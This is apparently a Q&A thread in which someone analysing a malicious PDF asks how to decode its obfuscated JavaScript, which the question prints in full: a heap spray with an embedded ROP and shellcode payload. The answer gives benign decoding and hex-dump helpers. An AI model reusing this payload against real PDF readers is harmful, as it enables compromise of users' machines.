Extract JavaScript from malicious PDF


Question

I have a PDF file that I know for a fact contains a JavaScript script that does something malicious, though I'm not sure exactly what at this point.

I have successfully uncompressed the PDF file and gotten the plaintext JavaScript source code, but the code itself is kind of hidden in a syntax I haven't seen before.

Code example: this is what the majority of the code looks like

var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')

I imagine that this notation, with its long variable/function names and hidden text characters, is meant to confuse scanners that look for these kinds of things.

Two questions:

Question 1

Can someone tell me what the notation with %u4141 is called?

Question 2

Is there a tool that will translate that notation into plaintext so I can see what it is doing?

Full JS code:

var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');

var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");

while (C.length + 20 + 8 < 65536) C+=C;

D = C.substring(0, (0x0c0c-0x24)/2);

D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";

Recommended answer

Those could be memory addresses, OS calls, heap spraying, anything.

The clue is that the function being called is unescape. To get the actual values, you want to unescape that text. There are online tools for unescaping text, such as http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html.
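As a rough illustration of what unescaping means here: the %uXXXX form is the non-standard Unicode percent-escape that unescape understands, where each escape stands for one 16-bit code unit. The sketch below parses that notation by hand from a static string, so nothing from the sample is executed. The helper name decodePercentU is hypothetical, not part of any library.

```javascript
// Decode %uXXXX escapes into an array of 16-bit code units.
// Only a static string is parsed; nothing from the sample is executed.
// decodePercentU is a hypothetical helper name used for illustration.
function decodePercentU(escaped) {
  const units = [];
  const pattern = /%u([0-9a-fA-F]{4})/g;
  let match;
  while ((match = pattern.exec(escaped)) !== null) {
    units.push(parseInt(match[1], 16));
  }
  return units;
}

// The first few escapes from the string in the question.
const sample = '%u4141%u4141%u63a5%u4a80';
const units = decodePercentU(sample);
console.log(units.map((u) => u.toString(16).padStart(4, '0')).join(' '));
// prints "4141 4141 63a5 4a80"
```

Pasting the full string from the question in place of sample gives the complete list of code units, which can then be inspected as numbers rather than as text.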

The result will likely be garbage in ASCII, but you can try plugging it into a hex editor to see if you can make any more sense out of it. If a virus scanner can identify the infection source of that file, maybe you can do more research on that particular malware and figure out what that code is doing.
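For looking at the data the way a hex editor would show it, one possible approach is to turn each %uXXXX escape into two bytes and print a hex dump. This sketch assumes the bytes are laid out low byte first (little-endian), which is how a JavaScript string would normally sit in memory on x86 Windows; that byte order is an assumption, not something stated in the question. The names percentUToBytes and hexDump are hypothetical helpers.

```javascript
// Convert %uXXXX escapes to bytes, low byte first.
// Little-endian order is an assumption made for this sketch.
function percentUToBytes(escaped) {
  const bytes = [];
  for (const m of escaped.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return bytes;
}

// Format bytes as offset, hex column, and printable-ASCII column.
function hexDump(bytes, width = 16) {
  const lines = [];
  for (let offset = 0; offset < bytes.length; offset += width) {
    const row = bytes.slice(offset, offset + width);
    const hex = row.map((b) => b.toString(16).padStart(2, '0')).join(' ');
    const ascii = row
      .map((b) => (b >= 0x20 && b < 0x7f ? String.fromCharCode(b) : '.'))
      .join('');
    lines.push(
      offset.toString(16).padStart(8, '0') + '  ' +
      hex.padEnd(width * 3 - 1) + '  ' + ascii
    );
  }
  return lines.join('\n');
}

// The first few escapes from the string in the question.
console.log(hexDump(percentUToBytes('%u4141%u4141%u63a5%u4a80')));
```

Under that byte-order assumption, the pair %u63a5%u4a80 becomes the bytes a5 63 80 4a, which reads as the 32-bit value 0x4a8063a5. Values that repeat with the same high half, as 0x4a80 and 0x4a84 do throughout the string, look more like addresses than like text.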

In the interest of science, fire up a Windows VM, run it, and see what it does :)
